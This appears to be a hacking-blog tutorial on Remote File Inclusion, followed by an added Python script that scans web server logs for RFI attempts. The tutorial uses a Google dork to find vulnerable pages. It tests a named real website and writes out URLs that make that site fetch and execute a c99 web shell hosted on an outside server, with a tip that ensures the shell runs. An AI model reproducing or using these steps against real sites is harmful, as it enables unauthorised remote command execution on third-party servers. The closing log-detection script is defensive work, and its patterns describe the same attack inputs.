Welcome back to hacking-class. In this article I will cover Remote File Inclusion (RFI), one of the most common vulnerabilities found in web applications. This type of vulnerability allows the hacker or attacker to include a remote file on the web server. If the attack succeeds, he/she will gain access to the web server and hence can execute any command on it.
1 - Searching for the Vulnerability
Remote File Inclusion vulnerabilities usually occur in sites that have a URL similar to the one below
The Google Dork is
“inurl:index.php?page=”
This will show all the pages that have “index.php?page=” in their URL. Now, to test whether the website is vulnerable to Remote File Inclusion or not, the hacker normally uses the following command
But as I am posting this here, the links must be a bit different :P
I found this site; it is very good to give you an example:
http://www.cbspk.com
Now we want to check whether it is vulnerable, so we type:
http://www.cbspk.com/v2/index.php?page=http://www.hacking-class.blogspot.com
Now this appears:
A website opens inside another website; this means the website is vulnerable to RFI.
You can also type
http://www.cbspk.com/v2/index.php?page=http://www.google.com
and you will get similar results.
OK, now moving on to the next part...
Now the hacker would upload a shell to gain access. The most common shells used are the c99 shell and the r57 shell. I would use the c99 shell.
The hacker would first upload the shell to a web hosting site such as ripway.com, 110mb.com, etc.
Now here is how a hacker would execute the shell to gain access. Let's say that the URL of the shell is
http://h1.ripway.com/saurav1234/c99shell.php?
Here is how the hacker would execute it on the website:
http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/saurav1234/c99shell.php?
Now voilà, we have executed the shell.
Now, I will not tell you how to run your scripts using the shell; try finding out yourself.
Note: Remember to add “?” at the end of the URL, or else the shell will not execute.
This is for educational purposes only; using this knowledge in an illegal way is strictly prohibited.
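On the defending side, the requests described above stand out in web server access logs, because a parameter such as page carries a full remote URL. The Python script below is an added example, not part of the original post; it assumes the combined log format, and its log lines, hosts and IP addresses are constructed placeholders. It goes slightly beyond the post by also normalising percent-encoded values before checking them.

```python
import re
from urllib.parse import parse_qsl, unquote

# Constructed access-log lines (combined log format); hosts and IPs are placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [12/Mar/2024:10:01:02 +0000] "GET /v2/index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:02:41 +0000] "GET /v2/index.php?page=http://remote.example/ HTTP/1.1" 200 48211 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:03:05 +0000] "GET /v2/index.php?page=http%3A%2F%2Fremote.example%2Ffile.php%3F HTTP/1.1" 200 9034 "-" "Mozilla/5.0"
203.0.113.5 - - [12/Mar/2024:10:04:19 +0000] "GET /v2/index.php?page=%2568ttps://remote.example/x.txt? HTTP/1.1" 200 733 "-" "curl/8.0"
192.0.2.10 - - [12/Mar/2024:10:05:00 +0000] "GET /search.php?q=what+is+http HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
"""

# Client address and request target from one combined-format log line.
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that starts with a remote URL scheme.
REMOTE_URL = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)


def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded values are normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_rfi_attempts(log_text):
    """Return (client_ip, parameter, decoded_value) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue
        client, target = match.groups()
        query = target.partition("?")[2]  # everything after the first "?"
        for name, value in parse_qsl(query, keep_blank_values=True):
            value = fully_decode(value)
            if REMOTE_URL.match(value):
                hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    for client, name, value in find_rfi_attempts(SAMPLE_LOG):
        print(f"{client} parameter={name!r} carries remote URL {value!r}")
```

A hit only shows that someone sent such a request; whether the application actually fetched the remote file depends on how the page parameter is handled on the server.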